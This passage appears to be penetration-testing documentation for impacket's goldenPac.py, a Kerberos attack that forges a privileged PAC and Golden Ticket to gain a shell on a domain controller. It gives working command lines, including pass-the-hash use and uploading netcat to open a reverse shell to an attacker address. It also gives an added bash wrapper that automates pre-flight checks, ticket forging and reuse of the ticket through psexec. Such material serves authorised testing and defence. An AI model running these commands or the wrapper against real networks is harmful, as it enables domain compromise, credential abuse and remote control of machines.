Because this is a Kerberos attack, the remote target and the domain MUST be specified as FQDNs (the KDC looks the service up by name, not by address) and the attacker machine MUST be time-synced with the domain controller (Kerberos rejects requests outside its clock-skew tolerance, 5 minutes by default).
It has the following generic command line arguments, similar to many other tools:
- positional argument #1 (required): the target, in the form `[[domain/]username[:password]@]<targetName or address>`. If the password is omitted it is prompted for interactively.
- `-dc-ip`: IP address of the domain controller. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified Domain Name (FQDN)).
- `-debug`: with this flag set, the utility is more verbose and may print information useful for debugging. With this flag set, the utility also prints tracebacks.
- `-ts`: with this flag set, the utility prepends all output with a timestamp.
It also has the following specific command line arguments:
- positional argument #2: command to execute on the target system (e.g. `powershell -c "nc.exe attacker_ip listener_port -e cmd.exe"`), or the arguments for the uploaded file if the `-c` option is used. If omitted, `cmd.exe` is executed via psexec to open a shell. If `None` is specified, no command is executed and only the TGT is saved for later use.
- `-target-ip`: IP address of the target machine. If omitted, the positional argument's target part will be used. This argument is useful when NetBIOS name resolution requests fail.
- `-c`: uploads the specified file to the remote target and executes it with the arguments passed in positional argument #2.
- `-w`: writes the Golden Ticket to the specified path. Useful together with `None` in positional argument #2.
```bash
# with cleartext credentials
goldenPac.py 'DOMAIN.LOCAL'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

# pass-the-hash (with an NT hash; the LM part is left empty)
goldenPac.py -hashes :'NThash' 'DOMAIN.LOCAL'/'USER'@'DOMAIN_CONTROLLER'

# uploads Netcat and executes a reverse shell
goldenPac.py -c ./nc.exe 'DOMAIN.LOCAL'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' 'attacker_ip listener_port -e cmd.exe'
```
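The two preconditions stated above (FQDN targets, clock in sync with the DC) are the usual reasons a goldenPac.py run fails with a Kerberos error rather than a clean result. The wrapper below is an added example, not part of impacket or of the original page: it checks both before running the tool, saves the forged ticket with `None` and `-w` instead of executing a command, and reuses the saved ticket over Kerberos with `psexec.py -k -no-pass`. It assumes `goldenPac.py`, `psexec.py` and `ntpdate` are on `PATH`, that `ntpdate -q` prints its offset as `offset <seconds>,` (the format of the reference ntpdate), that the saved ticket is a ccache (the format impacket writes), and a 300-second skew tolerance (the Kerberos default).

```bash
#!/usr/bin/env bash
# Pre-flight wrapper around goldenPac.py (added example; not impacket code).
# Assumed: goldenPac.py, psexec.py and ntpdate on PATH; -w writes a ccache.
set -euo pipefail

MAX_SKEW=300   # assumed: Kerberos default clock-skew tolerance (seconds)

# Kerberos needs a name the KDC can map to a service principal, so the target
# must be a FQDN: at least one dot, hostname characters only, and not a bare IP.
is_fqdn() {
    case "$1" in
        *.*) ;;                    # has at least one label separator
        *) return 1 ;;
    esac
    case "$1" in
        *[!A-Za-z0-9.-]*|.*|*.) return 1 ;;   # bad characters or dangling dots
    esac
    case "$1" in
        *[!0-9.]*) ;;              # contains a letter or hyphen: a real name
        *) return 1 ;;             # only digits and dots: an IPv4 address
    esac
    return 0
}

# Accepts a signed offset in whole seconds; succeeds if |offset| <= MAX_SKEW.
skew_ok() {
    local off=$1
    if [ "$off" -lt 0 ]; then
        off=$(( -off ))
    fi
    [ "$off" -le "$MAX_SKEW" ]
}

# Queries the DC's clock without adjusting ours and returns the offset in
# whole seconds. Assumed ntpdate -q line: "server <ip>, stratum <n>, offset <s>, delay <d>"
dc_offset_seconds() {
    ntpdate -q "$1" | awk '
        /stratum/ {
            for (i = 1; i <= NF; i++)
                if ($i == "offset") { sub(",", "", $(i+1)); printf "%.0f\n", $(i+1); exit }
        }'
}

# Usage: main DOMAIN.LOCAL user dc01.domain.local [ticket.ccache]
main() {
    local domain=$1 user=$2 dc=$3 ticket=${4:-golden.ccache} off
    is_fqdn "$domain" || { echo "domain must be a FQDN, got '$domain'" >&2; return 1; }
    is_fqdn "$dc"     || { echo "target must be a FQDN, got '$dc'" >&2; return 1; }

    off=$(dc_offset_seconds "$dc")
    if ! skew_ok "$off"; then
        echo "clock skew of ${off}s exceeds ${MAX_SKEW}s; sync first: sudo ntpdate $dc" >&2
        return 1
    fi

    # Only forge and save the ticket; the password is prompted for by goldenPac.py.
    goldenPac.py -w "$ticket" "$domain/$user@$dc" None

    # Reuse the saved ticket over Kerberos: no password or hash needed any more.
    KRB5CCNAME="$ticket" psexec.py -k -no-pass "$domain/$user@$dc"
}

# Run the live workflow only when arguments are given; the helpers can be
# sourced and checked on their own.
if [ "$#" -ge 3 ]; then
    main "$@"
fi
```

The FQDN check deliberately rejects a bare IP even though goldenPac.py would accept one syntactically: with an address in the target position the Kerberos exchange fails, and `-target-ip` is the right place for an address when name resolution is unreliable.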
The utility creates a PAC with the following default group RIDs: 513 (Domain Users), 512 (Domain Admins), 520 (Group Policy Creator Owners), 518 (Schema Admins) and 519 (Enterprise Admins).
There are scenarios where a ticket whose PAC carries only these RIDs isn't enough (for instance when access is granted to a custom group rather than to the built-in administrative groups). Also note that since the November 2021 updates (the PAC_REQUESTOR enforcement shipped for CVE-2021-42287), the domain controller checks that the account named in the ticket actually exists: if the supplied username doesn't exist in Active Directory, the ticket is rejected.